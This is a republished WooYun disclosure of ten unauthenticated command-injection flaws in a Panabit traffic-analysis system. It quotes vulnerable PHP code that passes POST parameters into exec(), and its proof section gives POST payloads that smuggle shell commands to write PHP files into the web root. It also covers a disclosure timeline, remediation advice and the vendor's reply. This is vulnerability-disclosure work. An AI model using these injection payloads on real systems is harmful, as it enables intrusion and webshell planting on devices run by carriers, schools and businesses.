Panabit某流量分析管理系统十处命令执行(无需登录) admin 103591文章 87评论 2017年5月4日23:27:39评论982 views字数 246阅读0分49秒阅读模式 摘要2016-03-11: 细节已通知厂商并且等待厂商处理中 2016-03-15: 厂商已经确认,细节仅向厂商公开 2016-03-18: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-05-09: 细节向核心白帽子及相关领域专家公开 2016-05-19: 细节向普通白帽子公开 2016-05-29: 细节向实习白帽子公开 2016-06-13: 细节向公众公开 漏洞概要 关注数(24) 关注此漏洞 缺陷编号: WooYun-2016-182986 漏洞标题: Panabit某流量分析管理系统十处命令执行(无需登录) 相关厂商: 北京派网软件有限公司 漏洞作者: komas 提交时间: 2016-03-11 01:50 公开时间: 2016-06-13 17:10 漏洞类型: 命令执行 危害等级: 高 自评Rank: 20 漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: 任意文件写入利用 2人收藏 漏洞详情 披露状态: 2016-03-11: 细节已通知厂商并且等待厂商处理中 2016-03-15: 厂商已经确认,细节仅向厂商公开 2016-03-18: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-05-09: 细节向核心白帽子及相关领域专家公开 2016-05-19: 细节向普通白帽子公开 2016-05-29: 细节向实习白帽子公开 2016-06-13: 细节向公众公开 简要描述: Panabit某流量分析管理系统十处命令执行(无需登录) 详细说明: 全部打包了只求全rank哇 官网案例:http://**.**.**.**/html/solution/success_case/2014/0903/82.html 可以看到此厂商面对的客户都是一些运营商 高校 企业 小区 网吧用户规模是非常大 第一 二 三 四处:根目录下的fetionlist.php qqlist.php sinawblist.php taobaolist.php code 区域 ..... 关键代码 $devid = $_POST['devid']; $ipaddr = $_POST['ipaddr']; $qqnumber = $_POST['qqnumber']; $strstart = $_POST['starttime']; $strend = $_POST['endtime']; $topn = $_POST['topn']; $account = $_POST['account']; $errfile = _CHECKING_STATUS_F.'/'.$_POST['errname']; $bexport = $_POST['bexport']; $eventtype = $_POST['eventtype']; if ($bexport == 1) $filename = date("YmdHis").".xls"; else if ($bexport == 2) $filename = date("YmdHis").".txt"; else if ($bexport == 3) $filename = date("YmdHis").".csv"; else $filename = "none"; $longstart = strtotime($strstart); $longend = strtotime($strend); if ($ipaddr == "") $ipaddr = "none"; else $ipaddr = ip2long($ipaddr); if ($qqnumber == "") $qqnumber = "none"; if ($account == "") $account = "none"; $tbstart = explode(' ', $strstart); $tbstarts = $tbstart[0]." 
00:00:00"; $slong = strtotime($tbstarts) - 24*3600; $elong = $longend; $tablestr = $slong."/".$elong; $k = 0; $result = array(); $res = array(); $link = $filename; $tablefile = php_getfetiontable($strstart, $strend); $cmd = LOGDPATH."/bin/logeye fetionlist $devid $ipaddr $qqnumber $account $longstart $longend $tablefile $bexport $filename $errfile $topn $eventtype"; exec($cmd, $output, $return); 这四处关键部分大概内容都差不多 四处变量$devid $ipaddr $qqnumber $account无防护传给$cmd, $cmd直接进入exec()函数导致命令执行 第五 六处:/Maintain/createappgraph.php /Maintain/createipgraph.php code 区域 $devid = $_POST['devid']; $strstart = $_POST['tmstart']; $strend = $_POST['tmend']; $topapp = $_POST['topapp']; $linkid = $_POST['linkid']; $appname = $_POST['appname']; $conn = mysql_connect(MYSQL_HOST, MYSQL_USER, MYSQL_PASS); mysql_query("set names 'utf8'"); $result = mysql_query("select name from palog.axp where cname = '$appname'"); if (mysql_num_rows($result) != 0) { $row = mysql_fetch_row($result); $appname = $row[0]; } mysql_close(); $longstart = strtotime($strstart); $longend = strtotime($strend); $tbstart = explode(' ', $strstart); $tbstarts = $tbstart[0]." 
00:00:00"; $slong = strtotime($tbstarts)-30*60; $elong = $longend; $tables = $slong."/".$elong; function formatdata($values, $u) { if ($values > 1024*1024*1024){ $units = 'G'; $div = 1024*1024*1024; } else if ($values > 1024*1024){ $units = 'M'; $div = 1024*1024; } else if ($values > 1024){ $units = 'K'; $div = 1024; }else { $units = 'B'; $div = 1; } if ($u == 'units') return $units; else return $div; } $labels = array(); $values = array(); $chart = new VerticalBarChart(1100, 300); $dataSet = new XYDataSet(); exec(DOCROOT."//bin//logeye.exe apptop $devid $longstart $longend $tables $topapp appup $linkid", $output, $return); Maintain 为后台目录，但未做权限验证，导致未授权访问。 这两处关键部分大概内容都差不多。 三个变量 $devid $linkid $topapp 未经过滤进入 exec() 函数，导致命令执行（此外 $appname 未经转义直接拼入 mysql_query() 的查询字符串，同样存在 SQL 注入风险）。 第七 八处/Maintain/exportpdf.php /Maintain/exportpdf_cgi.php code 区域 $devid = $_POST['devid']; $ip = $_POST['ip']; $strstart = $_POST['tmstart']; $strend = $_POST['tmend']; $top = $_POST['top']; $errfile = _CHECKING_STATUS_F.'/'.$_POST['errname']; if ($ip == "") $ip = "**.**.**.**-**.**.**.**"; $longstart = strtotime($strstart); $longend = strtotime($strend); $tbstart = explode(' ', $strstart); $tbstarts = $tbstart[0]." 
00:00:00"; $slong = strtotime($tbstarts)-6*30*60; $elong = $longend; $tables = $slong."/".$elong; $pdf=new PDF('P', 'mm', 'A4'); $pdf->Open(); $pdf->SetMargins(5, 5, 5); $pdf->AddPage(); $pdf->SetDisplayMode('real'); $pdf->AddGBFont(); $pdf->SetFont('GB', 'B', 25); $pdf->SetXY(57, 70); $pdf->Cell(40,10, '流控日志管理系统报表'); $pdf->Ln(); $pdf->SetX(80); $pdf->Cell(40,10,'('.date('Y/m/d').')'); $pdf->Ln(); $pdf->Image($doc.'/img/logo.jpg', 75, 90, 50, 15); $pdf->SetFont('GB', '', 14); $pdf->Ln(50); $pdf->SetX(60); $pdf->Cell(40, 10, '创建用户:'); $pdf->Cell(40, 10, $_COOKIE['c_username']); $pdf->Ln(); $pdf->SetX(60); $pdf->Cell(40, 10, '流控设备编号:'); if ($devid == 0) $pdf->Cell(40, 10, "所有设备"); else $pdf->Cell(40,10, $devid); $pdf->Ln(); $pdf->SetX(60); $pdf->Cell(40, 10, '统计时间段:'); $pdf->Cell(40, 10, date('Y/m/d H:i', $longstart).'-'.date('Y/m/d H:i', $longend)); $pdf->Ln(); $pdf->SetX(60); $pdf->Cell(40, 10, '报表生成时间:'); $pdf->Cell(40, 10, date('Y/m/d H:i'), 0,1,'L',false); $dwidth = array(10, 28, 18, 18, 18, 18, 18, 18, 18, 18, 18); $arcolors = array("#068BC5","#4EB133","#E6561C","#E6EB01","#24C8E3","#62E172","#F7EE64","#69F5C3","#ACDBFD","#C6C9CA", "#F68F67","#CDE577","#710000","#5D584B","#4572A7"); $pdf->AddPage(); $tablefile = php_getiptable($strstart, $strend, $devid); exec(LOGDPATH."/bin/logeye iptop $devid $ip $longstart $longend $tablefile $top total $errfile", $output, $return); $xlabels = array(); $yvalues = array(); foreach($output as $key=>$val){ $ds = explode(' ', $val); if ($ds[0] == "**.**.**.**") continue; array_push($xlabels, $ds[0]); array_push($yvalues, (double)$ds[1] / 1000 / 1000); } if (count($yvalues) != 0) { $graph = new Graph(1000,300,'auto'); $graph->SetScale("textlin"); $graph->img->SetMargin(50,50,10,100); $graph->title->SetFont(FF_SIMSUN, FS_NORMAL); $graph->xaxis->SetFont(FF_SIMSUN, FS_NORMAL); $graph->title->Set("(单位:M)"); $graph->ygrid->SetFill(false); $graph->xaxis->SetLabelAngle(50); $graph->xaxis->SetTickLabels($xlabels); 
$graph->yaxis->HideLine(false); $graph->yaxis->HideTicks(false,false); $bplot = new BarPlot($yvalues); $bplot->SetFillColor($arcolors); $graph->Add($bplot); $graph->Stroke($doc."/download/iptotal.png"); $pdf->SetFont('GB', 'B', 14); $pdf->Cell(40, 10, '用户统计'); $pdf->Ln(); $pdf->Ln(); $pdf->Image($doc.'/download/iptotal.png', $pdf->GetX(), $pdf->GetY(), 200, 80); //unlink($doc.'/download/iptotal.png'); $pdf->Ln(); $pdf->SetY(110); $pdf->SetFillColor(58,110,165); $pdf->SetTextColor(255, 255,255); $pdf->SetFont('GB', 'B', 10); $pdf->Cell(10, 14, "序号", 1, 0, 'C', true); $pdf->Cell(28, 14, "用户", 1, 0, 'C', true); $pdf->Cell(54, 7, "流量(字节)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7); $pdf->Cell(54, 7, "平均速率(bps)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->SetXY($pdf->GetX(), $pdf->GetY()-7); $pdf->Cell(54, 7, "峰值速率(bps)", 1, 2, 'C', true); $pdf->Cell(18, 7, "上行", 1, 0, 'C', true); $pdf->Cell(18, 7, "下行", 1, 0, 'C', true); $pdf->Cell(18, 7, "总", 1, 0, 'C', true); $pdf->Ln(); $pdf->SetTextColor(0, 0,0); foreach($output as $key=>$val){ $ds = explode(' ', $val); if ($ds[0] == "**.**.**.**") continue; $pdf->Cell($dwidth[0], 7, $key+1, 1, 0, 'C'); $pdf->Cell($dwidth[1], 7, $ds[0], 1, 0, 'C'); $pdf->Cell($dwidth[2], 7, dataformat((double)$ds[2]), 1, 0, 'C'); $pdf->Cell($dwidth[3], 7, dataformat((double)$ds[3]), 1, 0, 'C'); $pdf->Cell($dwidth[4], 7, dataformat((double)$ds[1]), 1, 0, 'C'); $pdf->Cell($dwidth[5], 7, dataformat((double)$ds[2]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[6], 7, dataformat((double)$ds[3]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[7], 7, dataformat((double)$ds[1]*8/$ds[8]), 1, 0, 'C'); $pdf->Cell($dwidth[8], 7, dataformat((double)$ds[6]*8/$ds[9]), 1, 0, 'C'); $pdf->Cell($dwidth[9], 7, 
dataformat((double)$ds[7]*8/$ds[9]), 1, 0, 'C'); $pdf->Cell($dwidth[10], 7, dataformat(((double)$ds[6]+(double)$ds[7])*8/$ds[9]), 1, 0, 'C'); $pdf->Ln(); } $pdf->AddPage(); unset($output); unset($xlabels); unset($yvalues); } else { outputres("no", "noip"); exit; } $tablefile = php_getapptable($strstart, $strend); exec(LOGDPATH."/bin/logeye apptop $devid $longstart $longend $tablefile $top total 0 $errfile", $output, $return); 这两处关键部分大概内容都差不多。 变量 $devid $top 未经过滤进入 exec() 函数，导致命令执行（同一文件中拼入 exec() 的 $ip、$errfile 亦直接取自 POST 参数）。 第九处:/Maintain/ifadmin.php code 区域 <?php $doc = $_SERVER['DOCUMENT_ROOT']; include("$doc/common.php"); $ifadmin = $_POST['ifadmin']; $ipaddr = $_POST['ipaddr']; $netmask = $_POST['netmask']; $gateway = $_POST['gateway']; $confl = array(); $confl = file("/etc/rc.conf"); foreach($confl as $val){ if (strstr($val, "ifconfig") !== false){ $ds = explode('=', $val); $ifconfig = $ds[0]; $ipstr = $ds[1]; $ds1 = explode('_', $ifconfig); $ori_ifadmin = $ds1[1]; $ds2 = explode(' ', $ipstr); $ori_ipaddr = $ds2[1]; $ori_netmask = trim($ds2[3], "\"\n\r"); } if (strstr($val, "defaultrouter") !== false){ $ds = explode('=', $val); $ori_gateway = trim($ds[1], "\"\n\r"); } } if ($ipaddr == $ori_ipaddr && $netmask == $ori_netmask && $gateway == $ori_gateway) outputres("yes", "操作成功"); else{ $confl = array(); $confl = file("/etc/rc.conf"); $fp = fopen("/etc/rc.conf", "w"); foreach($confl as $val){ if (strstr($val, "ifconfig") !== false){ fwrite($fp, "ifconfig_$ifadmin=\"inet $ipaddr netmask $netmask\"\n"); continue; } if (strstr($val, "defaultrouter") !== false){ fwrite($fp, "defaultrouter=\"$gateway\"\n"); continue; } fwrite($fp, $val); } fclose($fp); exec("ifconfig $ifadmin $ipaddr netmask $netmask"); exec("route add default $gateway"); outputres("yes", "操作成功"); } ?> 变量 $ifadmin $ipaddr $netmask $gateway 未经过滤即拼入 exec()，导致命令执行（同时被原样写入 /etc/rc.conf）。 第十处:/Maintain/zpool_set.php code 区域 if (!file_exists("/usr/logd/bin/install_device")){ outputres("no", "对不起,此功能在最新ISO安装的系统上有效"); exit(0); } if ($type == "add"){ $add = $_POST['add']; exec("df -h | grep 
mylog", $output, $ret); if ($ret == 1){ outputres("no", "zpool mylog is not exists!"); exit(0); } exec("zpool add -f mylog $add", $output, $ret); if ($ret == 1){ outputres("no", $output[0]); exit(0); } outputres("yes", ""); } if ($type == "replace"){ $repla = $_POST['repla']; $new_repla = $_POST['new_repla']; exec("df -h | grep mylog", $output, $ret); if ($ret == 1){ outputres("no", "zpool mylog is not exists!"); exit(0); } exec("zpool replace -f mylog $repla $new_repla", $output, $ret); if ($ret == 1){ outputres("no", $output[0]); exit(0); } outputres("yes", ""); } 变量 $add $repla $new_repla 未经过滤即拼入 exec()，导致命令执行。 漏洞证明: 这么多处,随便拿两处来说吧 第四处证明拿一处来说 **.**.**.**/qqlist.php postdata: devid=1&ipaddr=**.**.**.**&account=xx;echo 1111>/usr/logd/www/1111.php 执行完会在根目录生成一个1111.php的文件 第二处后台证明:**.**.**.**/Maintain/exportpdf.php postdata:devid=11;echo xxxxxxx>/usr/logd/www/223.php 后台其它文件也是同理会执行成功 修复方案: 交给厂商（从修复角度看，上述各处拼入 exec() 的每个参数都应先做格式校验并使用 escapeshellarg() 转义，/Maintain/ 目录下的页面应增加登录鉴权，mysql_query() 应改为参数化查询） 版权声明:转载请注明来源 komas@乌云 漏洞回应 厂商回应: 危害等级:高 漏洞Rank:16 确认时间:2016-03-15 17:01 厂商回复: CNVD未直接复现所述情况,已由CNVD通过软件生产厂商公开联系渠道向其邮件通报,由其后续提供解决方案并协调相关用户单位处置。 最新状态: 暂无 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(少于3人评价): 登陆后才能进行评分 100% 0% 0% 0% 0% 评价 2016-03-11 08:57 | 牛肉包子 ( 普通白帽子 | Rank:307 漏洞数:70 | baozisec) 2 $$$ 1# 回复此人 2016-03-11 09:05 | komas ( 普通白帽子 | Rank:107 漏洞数:25 ) 2 @牛肉包子 我竟无言以对,咋可能 2# 回复此人 2016-03-11 09:06 | king7 ( 普通白帽子 | Rank:1902 漏洞数:253 | 早知如此绊人心,何如当初莫相识。) 2 可以 3# 回复此人 2016-03-11 09:09 | komas ( 普通白帽子 | Rank:107 漏洞数:25 ) 2 @king7 求带 4# 回复此人 2016-03-11 10:56 | f4ckbaidu ( 普通白帽子 | Rank:265 漏洞数:33 | 开发真是日了狗了) 2 $$ 5# 回复此人 2016-03-18 12:07 | 北京派网软件有限公司(乌云厂商) 1 已修正 6# 回复此人 点赞 https://cn-sec.com/archives/43915.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫